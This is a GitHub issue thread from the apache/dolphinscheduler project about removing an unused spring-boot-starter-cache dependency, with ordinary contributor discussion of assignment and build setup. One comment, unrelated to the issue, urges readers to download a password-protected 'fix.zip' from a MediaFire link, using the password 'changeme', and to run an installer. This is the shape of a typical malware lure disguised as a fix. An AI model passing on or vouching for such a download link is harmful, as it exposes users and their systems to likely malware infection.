### ISSUE TITLE
[Improvement] Remove spring-boot-starter-cache dependency

### ISSUE THREAD

**Issue by ruanwenjun** [apache/dolphinscheduler#16507]
### Search before asking

- [X] I had searched in the [issues](https://github.com/apache/dolphinscheduler/issues?q=is%3Aissue) and found no similar feature requirement.

### Description

This is not used anymore.

### Are you willing to submit a PR?

- [ ] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by binitshrest** [comment]
I am interested in solving this issue.

**Comment by SbloodyS** [comment]
> I am interested in solving this issue.

I've assigned to you. Looking forward to your contribution.

**Comment by binitshrest** [comment]
> > I am interested in solving this issue.
> 
> I've assigned to you. Looking forward to your contribution.

Hi, I have started working on this contributions. 
This applications is not running in my system due to spotless plugin error. I tried upgrading but it says it is missing some class file i.e com/sun/source/tree/Tree

I have JDK 17 installed.

**Comment by SbloodyS** [comment]
> Hi, I have started working on this contributions. This applications is not running in my system due to spotless plugin error. I tried upgrading but it says it is missing some class file i.e com/sun/source/tree/Tree
> 
> I have JDK 17 installed.

You can refer to the docs in https://github.com/apache/dolphinscheduler/blob/dev/docs/docs/en/contribute/development-environment-setup.md

**Comment by binitshrest** [comment]
I have checked the docs and i have installed the required OS and particular installation.  Let me work from now on. I will keep you posted.

**Comment by binitshrest** [comment]
After careful observation about dependency spring-boot-starter-cache depedency and apllication.properties it has already been removed and i did some more few work understanding the code base and removed other extra dependencies that includes annotations like cacheable and cacheconfig. I removed and i ran the standalone server. It was running without any error. I am ready to do pull request.
